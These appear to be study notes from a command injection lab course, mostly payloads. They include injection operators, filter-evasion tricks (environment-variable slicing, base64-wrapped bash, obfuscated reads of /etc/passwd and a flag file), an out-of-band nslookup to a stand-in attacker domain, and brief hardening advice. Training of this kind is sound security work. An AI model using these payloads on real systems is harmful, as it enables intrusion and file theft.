Command injection

cmd injection list

Injection Operator	Injection Character	URL-Encoded Character	Executed Command
Semicolon	;	%3b	Both
New Line		%0a	Both
Background	&	%26	Both (second output generally shown first)
Pipe	|	%7c	Both (only second output is shown)
AND	&&	%26%26	Both (only if first succeeds)
OR	||	%7c%7c	Second (only if first fails)
Sub-Shell	``	%60%60	Both (Linux-only)
Sub-Shell	$()	%24%28%29	Both (Linux-only)

operators can be used for various injection types, like SQL injections, LDAP injections, XSS, SSRF, XML, etc. We have created a list of the most common operators that can be used for injections:

Injection Type	Operators
SQL Injection	' , ; -- /* */
Command Injection	; &&
LDAP Injection	* ( ) & |
XPath Injection	' or and not substring concat count
OS Command Injection	; & |
Code Injection	' ; -- /* */ $() ${} #{} %{} ^
Directory Traversal/File Path Traversal	../ ..\\ %00
Object Injection	; & |
XQuery Injection	' ; -- /* */
Shellcode Injection	\x \u %u %n
Header Injection	\r %0d %0a %09

Whitebox Pentesting 101: Command Injection Course | HTB Academyacademy.hackthebox.com

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#bypass-without-space

bypass spaces

(127.0.0.1%0a{ls,-la})

ip=127.0.0.1%0a{ls,-la,}

ip=127.0.0.1%0a{ls,-la,${PATH:0:1}home${PATH:0:1}}

limitation when slashes stripped or blacklisted

echo ${PATH:0:1}
/

// to get semicolon
echo ${LS_COLORS:10:1}
;

understand how the above command resulted in a semi-colon, 
and then use it in the payload to use it as an injection operator. 
Hint: The printenv command prints all environment variables in Linux, 
so one can look which ones may contain useful characters, 
and then try to reduce the string to that character only.

Windows
echo %HOMEPATH:~6,-11%

Windows powershell
$env:HOMEPATH[0]

127.0.0.1%0a{c'a't,${PATH:0:1}home${PATH:0:1}1nj3c70r${PATH:0:1}flag.txt}

$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
$(rev<<<'imaohw')

base64 and bash
# find /usr/share/ | grep root | grep mysql | tail -n 1
echo -n 'find /usr/share/ | grep root | grep mysql | tail -n 1' | base64
bash<<<$(base64%09-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=)


git clone https://github.com/Bashfuscator/Bashfuscator
# cat /etc/passwd
bash -c 'eval "$(W0=(w \  t e c p s a \/ d);for Ll in 4 7 2 1 8 3 2 4 8 5 7 6 6 0 9;{ printf %s "${W0[$Ll]}";};)"'

// final assessment:
GET /index.php?to=tmp%26bash<<<$(base64%09-d<<<Y2F0IC9mbGFnLnR4dA==)&from=flag.txt&finish=1&move=1 HTTP/1.1

Recommendations:

we should make sure that our back-end server is securely configured to reduce the impact in the event that the webserver is compromised. Some of the configurations we may implement are:

Use the web server's built-in Web Application Firewall (e.g., in Apache mod_security), in addition to an external WAF (e.g. Cloudflare, Fortinet, Imperva..)

Abide by the Principle of Least Privilege (PoLP) by running the web server as a low privileged user (e.g. www-data)

Prevent certain functions from being executed by the web server (e.g., in PHP disable_functions=system,...)

Limit the scope accessible by the web application to its folder (e.g. in PHP open_basedir = '/var/www/html')

Reject double-encoded requests and non-ASCII characters in URLs

Avoid the use of sensitive/outdated libraries and modules (e.g. PHP CGI)

Blind Cmd injection: 127.0.0.1 && ping -c 10 127.0.0.1 &

out of band : 127.0.0.1 & nslookup kgj2.web-atacker.com &